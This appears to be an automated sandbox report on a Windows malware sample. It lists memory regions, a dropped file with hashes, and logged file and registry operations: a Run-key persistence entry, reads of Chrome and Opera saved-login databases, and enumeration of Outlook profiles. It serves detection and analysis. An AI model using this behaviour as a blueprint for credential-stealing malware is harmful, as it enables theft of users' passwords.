index.dat	0x005e0000	0x0061ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000610000	0x00610000	0x0074cfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000620000	0x00620000	0x00620fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000650000	0x00650000	0x0068ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000690000	0x00690000	0x0074ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000006d0000	0x006d0000	0x0070ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000710000	0x00710000	0x0074ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000750000	0x00750000	0x009cafff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000009d0000	0x009d0000	0x00bc4fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000bd0000	0x00bd0000	0x00dc4fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000dd0000	0x00dd0000	0x00eaefff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000ef0000	0x00ef0000	0x00efcfff	Pagefile Backed Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000f00000	0x00f00000	0x01afffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001b00000	0x01b00000	0x024c3fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000024d0000	0x024d0000	0x026c4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000024d0000	0x024d0000	0x025affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024d0000	0x024d0000	0x025cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000025b0000	0x025b0000	0x026affff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x026d0000	0x0299efff	Memory Mapped File	Readable	Region Actions
private_0x00000000029a0000	0x029a0000	0x02a9ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002aa0000	0x02aa0000	0x02f91fff	Private Memory	Readable, Writable	Region Actions
ieframe.dll	0x6d270000	0x6dceffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x6e510000	0x6e541fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cmutil.dll	0x6f260000	0x6f26dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x70fb0000	0x7106efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mlang.dll	0x71ba0000	0x71bcdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nss3.dll	0x72000000	0x721b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wsock32.dll	0x722a0000	0x722a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vaultcli.dll	0x722a0000	0x722abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleacc.dll	0x726e0000	0x7271bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x737f0000	0x73810fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windowscodecs.dll	0x73aa0000	0x73b9afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdiplus.dll	0x73d70000	0x73efffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73f00000	0x73f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x74080000	0x7421dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x745f0000	0x745f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74fd0000	0x74feafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74ff0000	0x74ffbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x750a0000	0x750aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75110000	0x7511bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x75120000	0x7523cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75260000	0x752a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75420000	0x754c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x754d0000	0x7556ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x75580000	0x7560efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75610000	0x7580afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75810000	0x76459fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76460000	0x76469fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76470000	0x7648efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76490000	0x765c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x765d0000	0x7661dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76620000	0x766e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x766f0000	0x7684bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76850000	0x768ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x768f0000	0x76908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76ab0000	0x76b32fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76b40000	0x76c0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76c10000	0x76ce3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x76cf0000	0x76de4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76df0000	0x76e34fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76e40000	0x76eebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76f50000	0x7708bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77090000	0x77095fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x770d0000	0x77104fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77110000	0x77114fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x77120000	0x77176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77190000	0x77190fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\bgc6u8oy yxgxkr\appdata\roaming\olo0nds-\olologim.jpeg	74.99 KB (76788 bytes)	MD5: 9679973c4495843a13589d438c7f9677 SHA1: 4d2ee9b5ef7aa537db4ef414ae9854426f8ae578 SHA256: e3925df9b65909ca5128b30cd53f1c106cd1cf3b7d36a26be06091dbab712ad8		File Actions Show Properties Download

Host Behavior

COM (1)

Operation	Class	Interface	Additional Information	Success	Count	Logfile
Create	3C374A40-BAE4-11CF-BF7D-00AA006946EE	AFA0DC11-C313-11D0-831A-00C04FD5AE38	cls_context = CLSCTX_INPROC_SERVER		1	Fn

File (173)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Windows\SYSTEM32\ntdll.dll	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	2	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Temp\lambdoidtegument.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	2	Fn
Create	\??\C:\Windows\System32\drivers\etc\hosts	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	2	Fn
Create	\??\C:\Program Files\Crfitq6x\gdigzvh.exe	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Program Files\Crfitq6x\gdigzvh.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	16	Fn
Create	\??\C:\Program Files\Crfitq6x\gdigzvh.exe	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-	desired_access = FILE_READ_DATA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlog.ini	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	40	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Opera Software\Opera Stable\Login Data	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini	desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	\??\C:\Program Files\Mozilla Firefox\Firefox.exe	desired_access = FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	2	Fn
Get Info	\??\C:\Windows\SYSTEM32\ntdll.dll	type = extended	3	Fn
Get Info	\??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe	type = extended	2	Fn
Get Info	\??\C:\Windows\System32\drivers\etc\hosts	type = extended	2	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-	type = extended	1	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	type = extended	1	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	type = extended	39	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	type = extended	1	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = extended	1	Fn
Get Info	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini	type = extended	1	Fn
Get Info	\??\C:\Program Files\Mozilla Firefox\Firefox.exe	type = extended	2	Fn
Read	\??\C:\Windows\SYSTEM32\ntdll.dll	offset = 0, size = 1288488	1	Fn
Read	\??\C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe	offset = 0, size = 237568	1	Fn Data
Read	\??\C:\Windows\System32\drivers\etc\hosts	offset = 0, size = 824	1	Fn Data
Read	\??\C:\Program Files\Mozilla Firefox\Firefox.exe	offset = 0, size = 275568	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 0, size = 40	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 40, size = 12	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 52, size = 82	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 134, size = 18	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 152, size = 24	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 176, size = 24	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 200, size = 20	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 220, size = 26	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 246, size = 18	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 264, size = 28	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 292, size = 6	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 298, size = 26	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 324, size = 46	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 370, size = 32	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 402, size = 20	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 422, size = 4	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 426, size = 12	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 438, size = 82	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 520, size = 18	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 538, size = 24	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 562, size = 26	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 588, size = 36	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 624, size = 26	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 650, size = 22	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 672, size = 12	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 684, size = 36	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 720, size = 24	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 744, size = 16	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 760, size = 24	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 784, size = 16	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 800, size = 20	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 820, size = 18	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 838, size = 46	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 884, size = 6	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 890, size = 32	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 922, size = 16	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 938, size = 46	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 984, size = 196	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 1180, size = 48	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini	offset = 1228, size = 28	1	Fn Data
Write	\??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrv.ini	offset = 0, size = 40	1	Fn Data

Registry (86)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	-	1	Fn
Create Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\	-	1	Fn
Create Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	-	1	Fn
Create Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird\	-	1	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-	6	Fn
Create Key	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = ProductName	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\	value_name = CurrentVersion	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\25.0 (en-US)\Main	value_name = Install Directory	1	Fn
Write Value	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	value_name = VFIL_RNHERNX, data = C:\Program Files\Crfitq6x\gdigzvh.exe, size = 74, type = REG_SZ	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\	-	12	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac	-	1	Fn
Enumerate Keys	HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e	-	1	Fn
